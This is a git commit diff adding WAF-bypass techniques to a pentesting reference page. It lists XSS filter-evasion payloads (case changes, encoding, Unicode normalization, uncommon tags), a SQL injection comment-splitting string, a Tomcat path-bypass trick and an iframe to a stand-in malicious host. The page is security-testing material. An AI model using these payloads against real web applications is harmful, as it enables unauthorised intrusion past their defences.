Merge pull request #649 from ally-petitt/master
Clean up and add additional WAF bypass techniques to waf-bypass.md
This commit is contained in:
commit
a2c9c0e50c
@ -12,13 +12,36 @@
|
||||
|
||||
</details>
|
||||
|
||||
## Regex Bypasses
|
||||
Different techniques can be used to bypass the regex filters on the firewalls. Examples include alternating case, adding line breaks,
|
||||
and encoding payloads. Resources for the various bypasses can be found at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads)
|
||||
and [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). The examples below were pulled from [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
|
||||
|
||||
```bash
|
||||
# IIS, ASP Clasic
|
||||
<%s%cr%u0131pt> == <script>
|
||||
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
|
||||
<<script>alert(XSS)</script> #prepending an additional "<"
|
||||
<script>alert(XSS) // #removing the closing tag
|
||||
<script>alert`XSS`</script> #using backticks instead of parenetheses
|
||||
java%0ascript:alert(1) #using encoded newline characters
|
||||
<iframe src=http://malicous.com < #double open angle brackets
|
||||
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
|
||||
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
|
||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
|
||||
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
|
||||
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
|
||||
<iframe src="javascript:alert(`xss`)"> #unicode encoding
|
||||
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
|
||||
new Function`alt\`6\``; #using backticks instead of parentheses
|
||||
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
|
||||
%26%2397;lert(1) #using HTML encoding
|
||||
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
|
||||
```
|
||||
|
||||
# Path blacklist bypass - Tomcat
|
||||
/path1/path2/ == ;/path1;foo/path2;bar/;
|
||||
|
||||
## Charset Encoding
|
||||
|
||||
```bash
|
||||
# Charset encoding
|
||||
application/x-www-form-urlencoded;charset=ibm037
|
||||
multipart/form-data; charset=ibm037,boundary=blah
|
||||
@ -38,6 +61,30 @@ Content-Length: 61
|
||||
%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
|
||||
```
|
||||
|
||||
## Obfuscation
|
||||
|
||||
```bash
|
||||
# IIS, ASP Clasic
|
||||
<%s%cr%u0131pt> == <script>
|
||||
|
||||
# Path blacklist bypass - Tomcat
|
||||
/path1/path2/ == ;/path1;foo/path2;bar/;
|
||||
```
|
||||
|
||||
## Unicode Compatability
|
||||
Depending on the implementation of Unicode normalization (more info [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), characters that share Unicode
|
||||
compatability may be able to bypass the WAF and execute as the intended payload. Compatible characters can be found [here](https://www.compart.com/en/unicode)
|
||||
|
||||
### Example
|
||||
|
||||
```bash
|
||||
# under the NFKD normalization algorithm, the characters on the left translate
|
||||
# to the XSS payload on the right
|
||||
<img src⁼p onerror⁼'prompt⁽1⁾'﹥ --> <img src=p onerror='prompt(1)'>
|
||||
```
|
||||
|
||||
## Exceeding Size Limitations
|
||||
|
||||
It's common in cloud based WAFs that if the payload is bigger than X size, the request won't be checked by the WAF. You can simply use that to bypass them.
|
||||
|
||||
<details>
|
||||
|
Loading…
Reference in New Issue
Block a user